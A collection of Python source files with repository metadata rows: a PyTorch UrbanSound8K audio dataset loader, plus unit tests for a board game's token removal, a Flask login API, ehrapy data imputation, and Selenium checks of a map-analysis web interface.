feat_set = set(feat_files)
val_files = glob.glob(os.path.join(root, "fold{}/*.wav".format(str(fold))))
val_set = set(val_files)
train_set = feat_set - val_set
self.all_files = feat_files
self.target_sr = target_sr
if split == "train":
self.files = list(train_set)
elif split == "valid":
self.files = val_files
elif split == "full":
self.files = feat_files
else:
raise ValueError("split not supported.")
self.transform = transform
logger.info("Loading fold {}, split {}, {} files".format(str(fold), split, len(self.files)))
def __getitem__(self, idx):
"""
:param idx:
:return: audio, label
"""
file = self.files[idx]
if isinstance(self.transform, FakePitchShift):
file = self.transform(file)
if isinstance(self.transform, Compose):
if isinstance(self.transform.transforms[0], FakePitchShift):
file = self.transform.transforms[0](file)
with torch.no_grad():
# (channels, frames)
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
# print(file, sr)
audio = self._process_audio(audio, sr, self.target_sr)
wav_name = os.path.basename(file)
label = int(wav_name.split('-')[1])
sample = (audio.requires_grad_(False), torch.as_tensor(label, dtype=torch.int64).requires_grad_(False))
if self.transform and not isinstance(self.transform, FakePitchShift):
sample = self.transform(sample)
return sample
def __len__(self):
return len(self.files)
@staticmethod
def _process_audio(audio, sr, target_sr):
if audio.size(0) == 2:
# Downmix if multichannel
audio = torch.mean(audio, dim=0, keepdim=True)
audio = audio[0]
if sr != target_sr:
audio = resampy.resample(audio.numpy(), sr_orig=sr, sr_new=target_sr, filter='kaiser_best')
audio = torch.as_tensor(audio, dtype=torch.float32)
# padding to 4 seconds audio on both side
target_len = target_sr * 4
pad_len = target_len - len(audio)
if pad_len > 0:
_pad = math.ceil(pad_len / 2)
if pad_len % 2 == 0:
audio = torch.nn.functional.pad(audio, [_pad, _pad])
else:
audio = torch.nn.functional.pad(audio, [_pad, _pad - 1])
assert audio.size(0) == target_len
if audio.size(0) > target_len:
audio = audio[:target_len]
return audio.requires_grad_(False)
def print(self):
for file in self.all_files:
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
print(file, sr, audio.size(1) / sr)
def get_flens(self):
self.flens = []
for file in self.all_files:
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
self.flens.append(audio.size(1) / sr)
return self.flens
@register_dataset
class UrbanSound8KRepeat(torch.utils.data.Dataset):
"""
Padding <4s audio to 4s by repeating the recording.
sr is different file to file, most is 44100, 48000, 96000.
max 4 seconds audio, some less.
"""
def __init__(self, fold, split, target_sr=44100, transform=None):
super(UrbanSound8KRepeat, self).__init__()
# load pre-saved resampled audio instead of resampling on the fly,
# which is computational expensive.
if target_sr == 44100:
root = '/data/songhongwei/UrbanSound8K/audio44100/'
elif target_sr == 22050:
root = '/data/songhongwei/UrbanSound8K/audio22050/'
else:
root = '/data/songhongwei/UrbanSound8K/audio/'
logger.info("Loading data from {}".format(root))
if not os.path.exists(root):
raise Exception("{} does not exists.".format(root))
feat_files = glob.glob(os.path.join(root, "**/*.wav"), recursive=True)
feat_set = set(feat_files)
val_files = glob.glob(os.path.join(root, "fold{}/*.wav".format(str(fold))))
val_set = set(val_files)
train_set = feat_set - val_set
self.all_files = feat_files
self.target_sr = target_sr
if split == "train":
self.files = list(train_set)
elif split == "valid":
self.files = val_files
elif split == "full":
self.files = feat_files
else:
raise ValueError("split not supported.")
self.transform = transform
logger.info("Loading fold {}, split {}, {} files".format(str(fold), split, len(self.files)))
def __getitem__(self, idx):
"""
:param idx:
:return: audio, label
"""
file = self.files[idx]
if isinstance(self.transform, FakePitchShift):
file = self.transform(file)
if isinstance(self.transform, Compose):
if isinstance(self.transform.transforms[0], FakePitchShift):
file = self.transform.transforms[0](file)
with torch.no_grad():
# (channels, frames)
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
# print(file, sr)
audio = self._process_audio(audio, sr, self.target_sr)
wav_name = os.path.basename(file)
label = int(wav_name.split('-')[1])
sample = (audio.requires_grad_(False), torch.as_tensor(label, dtype=torch.int64).requires_grad_(False))
if self.transform and not isinstance(self.transform, FakePitchShift):
sample = self.transform(sample)
return sample
def __len__(self):
return len(self.files)
def _process_audio(self, audio, sr, target_sr):
if audio.size(0) == 2:
# Downmix if multichannel
audio = torch.mean(audio, dim=0, keepdim=True)
audio = audio[0]
if sr != target_sr:
audio = resampy.resample(audio.numpy(), sr_orig=sr, sr_new=target_sr, filter='kaiser_best')
audio = torch.as_tensor(audio, dtype=torch.float32)
# repeat no more than 4 times.
pad_zero_len = target_sr - len(audio)
if pad_zero_len > 0:
audio = self.pad_zero(audio, pad_zero_len)
# padding to 4 seconds audio on both side
target_len = target_sr * 4
pad_len = target_len - len(audio)
if pad_len > 0:
n_repeat = math.ceil(target_len / len(audio))
audio = audio.repeat(n_repeat)[:target_len]
if audio.size(0) > target_len:
audio = audio[:target_len]
return audio.requires_grad_(False)
def pad_zero(self, audio, pad_zero_len):
if pad_zero_len > 0:
_pad = math.ceil(pad_zero_len / 2)
if pad_zero_len % 2 == 0:
audio = torch.nn.functional.pad(audio, [_pad, _pad])
else:
audio = torch.nn.functional.pad(audio, [_pad, _pad - 1])
return audio
def print(self):
"""
print file name, sr, and length in seconds.
"""
for file in self.all_files:
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
print(file, sr, audio.size(1) / sr)
def get_flens(self):
"""
file length in seconds.
"""
self.flens = []
for file in self.all_files:
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
self.flens.append(audio.size(1) / sr)
return self.flens
def raw_by_id(self, idx):
"""
load raw wave by file idx.
"""
audio, sr = torchaudio.load(filepath=self.files[idx], normalization=lambda x: torch.abs(x).max(),
channels_first=True)
wavname = os.path.basename(self.files[idx])
return audio[0], wavname.split('-')[1]
@register_dataset
class UrbanSound8KCached(torch.utils.data.Dataset):
"""
cache audio wav into memory, so that no need for resampling at each batch.
"""
def __init__(self, fold, split, target_sr=44100, transform=None):
super(UrbanSound8KCached, self).__init__()
root = '/data/songhongwei/UrbanSound8K/audio/'
if not os.path.exists(root):
raise Exception("{} does not exists.".format(root))
feat_files = glob.glob(os.path.join(root, "**/*.wav"), recursive=True)
feat_set = set(feat_files)
val_files = glob.glob(os.path.join(root, "fold{}/*.wav".format(str(fold))))
val_set = set(val_files)
train_set = feat_set - val_set
self.all_files = feat_files
self.target_sr = target_sr
if split == "train":
self.files = list(train_set)
elif split == "valid":
self.files = val_files
elif split == "full":
self.files = feat_files
else:
raise ValueError("split not supported.")
self.transform = transform
logger.info("Loading fold {}, split {}, {} files".format(str(fold), split, len(self.files)))
self.samples = self._cache_audio()
def _cache_audio(self):
samples = []
for file in tqdm(self.files):
# (channels, frames)
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
# print(file, sr)
audio = self._process_audio(audio, sr, self.target_sr)
wav_name = os.path.basename(file)
label = int(wav_name.split('-')[1])
samples.append((audio.requires_grad_(False),
torch.as_tensor(label, dtype=torch.int64).requires_grad_(False)))
return samples
def __getitem__(self, idx):
"""
:param idx:
:return: audio, label
"""
return self.samples[idx]
def __len__(self):
return len(self.files)
@staticmethod
def _process_audio(audio, sr, target_sr):
if audio.size(0) == 2:
# Downmix if multichannel
audio = torch.mean(audio, dim=0, keepdim=True)
audio = audio[0]
if sr != target_sr:
audio = resampy.resample(audio.numpy(), sr_orig=sr, sr_new=target_sr, filter='kaiser_best')
audio = torch.as_tensor(audio, dtype=torch.float32)
# padding to 4 seconds audio on both side
target_len = target_sr * 4
pad_len = target_len - len(audio)
if pad_len > 0:
_pad = math.ceil(pad_len / 2)
if pad_len % 2 == 0:
audio = torch.nn.functional.pad(audio, [_pad, _pad])
else:
audio = torch.nn.functional.pad(audio, [_pad, _pad - 1])
assert audio.size(0) == target_len
if audio.size(0) > target_len:
audio = audio[:target_len]
return audio.requires_grad_(False)
def print(self):
for file in self.all_files:
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
print(file, sr, audio.size(1) / sr)
if __name__ == '__main__':
dataset = UrbanSound8KRepeat(fold=2, split='train', target_sr=22050)
# dataset.output_sr_length()
# for data in dataset:
# dataset.print()
for d in dataset:
pass | 35.297814 | 119 | 0.595325 | 1,606 | 12,919 | 4.617684 | 0.118929 | 0.032362 | 0.012136 | 0.025485 | 0.818905 | 0.807174 | 0.804746 | 0.804746 | 0.804746 | 0.799218 | 0 | 0.019077 | 0.285858 | 12,919 | 366 | 120 | 35.297814 | 0.784739 | 0.078179 | 0 | 0.811245 | 0 | 0 | 0.060144 | 0.023903 | 0 | 0 | 0 | 0 | 0.008032 | 1 | 0.080321 | false | 0.004016 | 0.052209 | 0.012048 | 0.200803 | 0.024096 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
421e652e0c67555b1a75ce3ea7e253e2f6e3eb6a | 103 | py | Python | fastapi_rest_jsonapi/data/__init__.py | Zenor27/fastapi-rest-jsonapi | 1c6eaad0791949bbaf9f4032fb7ecd483e80a02a | [
"MIT"
] | 2 | 2022-03-01T00:59:04.000Z | 2022-03-03T06:17:51.000Z | fastapi_rest_jsonapi/data/__init__.py | Zenor27/fastapi-rest-jsonapi | 1c6eaad0791949bbaf9f4032fb7ecd483e80a02a | [
"MIT"
] | 9 | 2022-01-16T15:47:35.000Z | 2022-03-28T18:47:18.000Z | fastapi_rest_jsonapi/data/__init__.py | Zenor27/fastapi-rest-jsonapi | 1c6eaad0791949bbaf9f4032fb7ecd483e80a02a | [
"MIT"
] | null | null | null | # flake8: noqa
from .data_layer import DataLayer
from .sqlachemy_data_layer import SQLAlchemyDataLayer
| 25.75 | 53 | 0.854369 | 13 | 103 | 6.538462 | 0.692308 | 0.211765 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01087 | 0.106796 | 103 | 3 | 54 | 34.333333 | 0.913043 | 0.116505 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
42243bbfbe0044e88e1cdf84bbd867c2ac580196 | 5,427 | py | Python | tests/tests_removing_tokens.py | pfertyk/aton-core | 72e5a92576cfe2996dc428a1cf801a537174858a | [
"Unlicense"
] | null | null | null | tests/tests_removing_tokens.py | pfertyk/aton-core | 72e5a92576cfe2996dc428a1cf801a537174858a | [
"Unlicense"
] | null | null | null | tests/tests_removing_tokens.py | pfertyk/aton-core | 72e5a92576cfe2996dc428a1cf801a537174858a | [
"Unlicense"
] | null | null | null | import json
from unittest import TestCase
from unittest.mock import Mock
from main import AtonCore, State
class TestRemovingTokens(TestCase):
def test_orders_player_to_remove_opponents_tokens(self):
notifiers = [Mock(), Mock()]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 4, 3, 4]
for i in range(4):
aton.temples[i].tokens[0] = 'blue'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
for notifier in notifiers:
notifier.assert_called_with(json.dumps({
'message': 'remove_tokens',
'player': 'red',
'token_owner': 'blue',
'number_of_tokens': 2,
'max_available_temple': 3,
}))
def test_orders_player_to_remove_own_tokens(self):
notifiers = [Mock(), Mock()]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 1, 3, 4]
for i in range(4):
aton.temples[i].tokens[0] = 'red'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
for notifier in notifiers:
notifier.assert_called_with(json.dumps({
'message': 'remove_tokens',
'player': 'red',
'token_owner': 'red',
'number_of_tokens': 1,
'max_available_temple': 3,
}))
def test_no_notification_when_no_tokens_should_be_removed(self):
def notifier(message):
self.assertNotIn('remove_tokens', message)
notifiers = [notifier, notifier]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 2, 3, 4]
for i in range(4):
aton.temples[i].tokens[0] = 'red'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
def test_no_notification_when_no_opponents_tokens_available(self):
def notifier(message):
self.assertNotIn('remove_tokens', message)
notifiers = [notifier, notifier]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 4, 3, 4]
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
def test_no_notification_when_no_own_tokens_available(self):
def notifier(message):
self.assertNotIn('remove_tokens', message)
notifiers = [notifier, notifier]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 1, 3, 4]
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
def test_no_notification_when_opponents_tokens_in_unavailable_temple(self):
def notifier(message):
self.assertNotIn('remove_tokens', message)
notifiers = [notifier, notifier]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 4, 3, 4]
for i in range(4):
aton.temples[3].tokens[i] = 'blue'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
def test_no_notification_when_own_tokens_in_unavailable_temple(self):
def notifier(message):
self.assertNotIn('remove_tokens', message)
notifiers = [notifier, notifier]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 1, 3, 4]
for i in range(4):
aton.temples[3].tokens[i] = 'red'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
def test_automatically_remove_opponents_tokens_when_possible(self):
notifiers = [Mock(), Mock()]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 4, 4, 4]
for i in range(2):
aton.temples[i].tokens[i] = 'blue'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
for notifier in notifiers:
notifier.assert_called_with(json.dumps({
'message': 'tokens_removed',
'removing_player': 'red',
'token_owner': 'blue',
'removed_tokens': [[0], [1], [], []]
}))
for temple_index, temple in enumerate(aton.temples):
for token in temple.tokens:
self.assertNotEqual(token, 'blue', 'Temple {}: {}'.format(
temple_index, temple.tokens))
def test_automatically_remove_own_tokens_when_possible(self):
notifiers = [Mock(), Mock()]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 1, 1, 4]
for i in range(4):
aton.temples[i].tokens[5] = 'red'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
for notifier in notifiers:
notifier.assert_called_with(json.dumps({
'message': 'tokens_removed',
'removing_player': 'red',
'token_owner': 'red',
'removed_tokens': [[5], [], [], []]
}))
temple = aton.temples[0]
for token in temple.tokens:
self.assertNotEqual(token, 'red', 'Temple {}: {}'.format(
0, temple.tokens))
| 32.692771 | 79 | 0.569191 | 597 | 5,427 | 4.99665 | 0.113903 | 0.051626 | 0.063359 | 0.07241 | 0.853503 | 0.844787 | 0.804894 | 0.804894 | 0.774723 | 0.774723 | 0 | 0.015684 | 0.318592 | 5,427 | 165 | 80 | 32.890909 | 0.790968 | 0 | 0 | 0.76259 | 0 | 0 | 0.076654 | 0 | 0 | 0 | 0 | 0 | 0.079137 | 1 | 0.100719 | false | 0 | 0.028777 | 0 | 0.136691 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
427fc4ca2f96d828fb861def4726c13b73a83e40 | 2,179 | py | Python | tests/test_login.py | ccolunga/flask_movie_api | e56ecfd2c482290221256fa3e4876090a5618b94 | [
"MIT"
] | null | null | null | tests/test_login.py | ccolunga/flask_movie_api | e56ecfd2c482290221256fa3e4876090a5618b94 | [
"MIT"
] | null | null | null | tests/test_login.py | ccolunga/flask_movie_api | e56ecfd2c482290221256fa3e4876090a5618b94 | [
"MIT"
] | null | null | null | import json
from tests.BaseCase import BaseCase
class TestUserLogin(BaseCase):
def test_successful_login(self):
# Given
email = "exam@gmail.com"
password = "strongpassword"
payload = json.dumps({
"email": email,
"password": password
})
response = self.app.post(
'/api/auth/signup', headers={"Content-Type": "application/json"}, data=payload)
# When
response = self.app.post(
'/api/auth/login', headers={"Content-Type": "application/json"}, data=payload)
# Then
self.assertEqual(str, type(response.json['token']))
self.assertEqual(200, response.status_code)
def test_login_with_invalid_email(self):
# Given
email = "exam@gmail.com"
password = "strongpassword"
payload = {
"email": email,
"password": password
}
response = self.app.post(
'/api/auth/signup', headers={"Content-Type": "application/json"}, data=json.dumps(payload))
# When
payload['email'] = "exam@gmail.com"
response = self.app.post(
'/api/auth/login', headers={"Content-Type": "application/json"}, data=json.dumps(payload))
# Then
self.assertEqual("Invalid username or password",
response.json['message'])
self.assertEqual(401, response.status_code)
def test_login_with_invalid_password(self):
# Given
email = "exam@gmail.com"
password = "strongpassword"
payload = {
"email": email,
"password": password
}
response = self.app.post(
'/api/auth/signup', headers={"Content-Type": "application/json"}, data=json.dumps(payload))
# When
payload['password'] = "myverycoolpassword"
response = self.app.post(
'/api/auth/login', headers={"Content-Type": "application/json"}, data=json.dumps(payload))
# Then
self.assertEqual("Invalid username or password",
response.json['message'])
self.assertEqual(401, response.status_code)
| 32.044118 | 103 | 0.57274 | 216 | 2,179 | 5.717593 | 0.217593 | 0.0583 | 0.072874 | 0.092308 | 0.822672 | 0.822672 | 0.822672 | 0.811336 | 0.759514 | 0.71498 | 0 | 0.00584 | 0.292795 | 2,179 | 67 | 104 | 32.522388 | 0.795587 | 0.02157 | 0 | 0.652174 | 0 | 0 | 0.237512 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 1 | 0.065217 | false | 0.217391 | 0.043478 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
c459c8ae2b2b6541ecea45d35d457ab380b7ec19 | 5,792 | py | Python | tests/api/preprocessing/test_imputation.py | theislab/ehrapy | a71391708e49df7c6b78c4329fe9e0368c6a4a79 | [
"Apache-2.0"
] | 8 | 2021-06-11T13:02:37.000Z | 2022-02-13T15:30:36.000Z | tests/api/preprocessing/test_imputation.py | theislab/ehrapy | a71391708e49df7c6b78c4329fe9e0368c6a4a79 | [
"Apache-2.0"
] | 196 | 2021-06-15T07:56:05.000Z | 2022-03-30T07:26:52.000Z | tests/api/preprocessing/test_imputation.py | theislab/ehrapy | a71391708e49df7c6b78c4329fe9e0368c6a4a79 | [
"Apache-2.0"
] | 1 | 2022-02-02T14:12:25.000Z | 2022-02-02T14:12:25.000Z | from pathlib import Path
import numpy as np
import pytest
from ehrapy.api.io import read
from ehrapy.api.preprocessing import explicit_impute, knn_impute, miss_forest_impute, simple_impute
from ehrapy.api.preprocessing._data_imputation import ImputeStrategyNotAvailableError
CURRENT_DIR = Path(__file__).parent
_TEST_PATH = f"{CURRENT_DIR}/test_data_imputation"
class TestImputation:
def test_mean_impute_no_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = simple_impute(adata)
assert id(adata) == id(adata_imputed)
assert not np.isnan(adata_imputed.X).any()
def test_mean_impute_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = simple_impute(adata, copy=True)
assert id(adata) != id(adata_imputed)
assert not np.isnan(adata_imputed.X).any()
def test_mean_impute_throws_error_non_numerical(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
with pytest.raises(ImputeStrategyNotAvailableError):
_ = simple_impute(adata)
def test_mean_impute_subset(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = simple_impute(adata, var_names=["intcol", "indexcol"])
assert not np.all([item != item for item in adata_imputed.X[::, 1:2]])
assert np.any([item != item for item in adata_imputed.X[::, 3:4]])
def test_median_impute_no_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = simple_impute(adata, strategy="median")
assert id(adata) == id(adata_imputed)
assert not np.isnan(adata_imputed.X).any()
def test_median_impute_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = simple_impute(adata, strategy="median", copy=True)
assert id(adata) != id(adata_imputed)
assert not np.isnan(adata_imputed.X).any()
def test_median_impute_throws_error_non_numerical(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
with pytest.raises(ImputeStrategyNotAvailableError):
_ = simple_impute(adata, strategy="median")
def test_median_impute_subset(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = simple_impute(adata, var_names=["intcol", "indexcol"], strategy="median")
assert not np.all([item != item for item in adata_imputed.X[::, 1:2]])
assert np.any([item != item for item in adata_imputed.X[::, 3:4]])
def test_most_frequent_impute_no_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = simple_impute(adata, strategy="most_frequent")
assert id(adata) == id(adata_imputed)
assert not (np.all([item != item for item in adata_imputed.X]))
def test_most_frequent_impute_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = simple_impute(adata, strategy="most_frequent", copy=True)
assert id(adata) != id(adata_imputed)
assert not (np.all([item != item for item in adata_imputed.X]))
def test_most_frequent_impute_subset(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = simple_impute(adata, var_names=["intcol", "strcol"], strategy="most_frequent")
assert not (np.all([item != item for item in adata_imputed.X[::, 1:3]]))
def test_knn_impute_no_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = knn_impute(adata)
assert id(adata) == id(adata_imputed)
def test_knn_impute_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = knn_impute(adata, copy=True)
assert id(adata) != id(adata_imputed)
def test_knn_impute_non_numerical_data(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = knn_impute(adata)
assert not (np.all([item != item for item in adata_imputed.X]))
def test_knn_impute_numerical_data(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = knn_impute(adata)
assert not (np.all([item != item for item in adata_imputed.X]))
def test_missforest_impute_non_numerical_data(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = miss_forest_impute(adata)
assert not (np.all([item != item for item in adata_imputed.X]))
def test_missforest_impute_numerical_data(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = miss_forest_impute(adata)
assert not (np.all([item != item for item in adata_imputed.X]))
def test_missforest_impute_subset(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = miss_forest_impute(adata, var_names={"non_numerical": ["intcol"], "numerical": ["strcol"]})
assert not (np.all([item != item for item in adata_imputed.X]))
def test_explicit_impute_all(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = explicit_impute(adata, replacement=1011)
assert (adata_imputed.X == 1011).sum() == 3
def test_explicit_impute_subset(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = explicit_impute(adata, replacement={"strcol": "REPLACED", "intcol": 1011})
assert (adata_imputed.X == 1011).sum() == 1
assert (adata_imputed.X == "REPLACED").sum() == 1
| 40.503497 | 115 | 0.69337 | 813 | 5,792 | 4.615006 | 0.093481 | 0.143923 | 0.069296 | 0.10661 | 0.857676 | 0.850746 | 0.850746 | 0.818763 | 0.818763 | 0.818763 | 0 | 0.006155 | 0.186464 | 5,792 | 142 | 116 | 40.788732 | 0.79011 | 0 | 0 | 0.510204 | 0 | 0 | 0.137949 | 0.109461 | 0 | 0 | 0 | 0 | 0.27551 | 1 | 0.204082 | false | 0 | 0.061224 | 0 | 0.27551 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c4760c38b1f8d6e21aca3bc8922b47e4c9fc4fb2 | 18,137 | py | Python | src_test/test.py | VoidMats/MapAnalyze | c4947fae1fcffa2def7eb6c6ba907fdd467a92f8 | [
"MIT"
] | null | null | null | src_test/test.py | VoidMats/MapAnalyze | c4947fae1fcffa2def7eb6c6ba907fdd467a92f8 | [
"MIT"
] | null | null | null | src_test/test.py | VoidMats/MapAnalyze | c4947fae1fcffa2def7eb6c6ba907fdd467a92f8 | [
"MIT"
] | null | null | null | from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC # available since 2.26.0
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.select import Select
from selenium.webdriver.common.action_chains import ActionChains
import time
import unittest
path = "http://localhost:1234"
class PythonTest(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
def test_layers(self):
print("************ Test layers ****************")
driver = self.driver
driver.get(path)
element = driver.find_element_by_xpath("//ol[@id='allLayers']")
#self.assertIn(null, element)
#Open sidebar
driver.find_element_by_id("btnOpenSidebar").click()
#Go to NetworkTab
driver.find_element_by_id("tabSidebarNetwork").click()
#Check allLayers Ol for entries
parentElement = driver.find_element_by_id("allLayers")
elementList = parentElement.find_elements_by_tag_name("li")
assert len(elementList) == 0
print("len(elementList): " + str(len(elementList)))
#Add layers
driver.find_element_by_id("openAddLayerModal").click()
driver.find_element_by_id("units").send_keys("2")
driver.find_element_by_id("addLayer").click()
#Check allLayers Ol for entries
elementList = parentElement.find_elements_by_tag_name("li")
assert len(elementList) == 1
print("len(elementList): " + str(len(elementList)))
time.sleep(1)
def test_inputs(self):
print("************ Test input ****************")
driver = self.driver
driver.get(path)
#Open sidebar
driver.find_element_by_id("btnOpenSidebar").click()
#Go to NetworkTab
driver.find_element_by_id("tabSidebarNetwork").click()
element = driver.find_element_by_id("epochsChoice")
element.clear()
element.send_keys("10")
print("Element value: " + element.get_attribute('value'))
assert( element.get_attribute('value') == "10" )
element = driver.find_element_by_id("learningRate")
element.clear()
element.send_keys("0.1")
print("Element value: " + element.get_attribute('value'))
assert( element.get_attribute('value') == "0.1" )
element = driver.find_element_by_id("lossChoice")
element.clear()
element.send_keys("SeleniumTest")
print("Element value: " + element.get_attribute('value'))
assert( element.get_attribute('value') == "SeleniumTest" )
element = Select(driver.find_element_by_id('optimizerChoice'))
element.select_by_visible_text("adagrad")
print("Element value: " + element.first_selected_option.text)
assert(element.first_selected_option.text == "adagrad")
def test_class(self):
print("************ Test class ****************")
sleeptime = 0
driver = self.driver
driver.get(path)
driver.maximize_window()
driver.find_element_by_id("btnOpenSidebar").click()
#element = driver.find_element_by_id("downloadPolygons")
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
# from wherever the mouse is, I move to the top left corner of the broswer
action = ActionChains(driver)
action.move_by_offset(500, 700)
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(100))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(100), int(0))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(-50))
action.click().perform()
action.click().perform()
time.sleep(2)
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown at close: " + str(modal.is_displayed()))
assert(modal.is_displayed() == True)
# Adding name to class
element = driver.find_element_by_id("newPolygonCategory")
element.clear()
element.send_keys("Skog")
# Push button add
driver.find_element_by_id("addClassName").click()
# Push save polygon
driver.find_element_by_id("savePolygon").click()
# Search for new element
#elements = driver.find_elements_by_xpath('//a[@href="Skogcollapse"]')
elements = driver.find_elements_by_id("Skogcollapse")
print("Number of elements at adding: " + str(len(elements)))
assert(len(elements) == 1)
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
# Draw new polygon
action.move_by_offset(50, 50)
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(100))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(100), int(0))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(-50))
action.click().perform()
action.click().perform()
time.sleep(2)
# Adding name to class
element = driver.find_element_by_id("newPolygonCategory")
element.clear()
element.send_keys("Stad")
# Push button add
driver.find_element_by_id("addClassName").click()
# Select dropdown
select = Select(driver.find_element_by_id("classes"))
# select by visible text
select.select_by_visible_text('Skog')
print("Select value Skog: " + select.first_selected_option.text)
assert(select.first_selected_option.text == "Skog")
# select by visible text
select.select_by_visible_text('Stad')
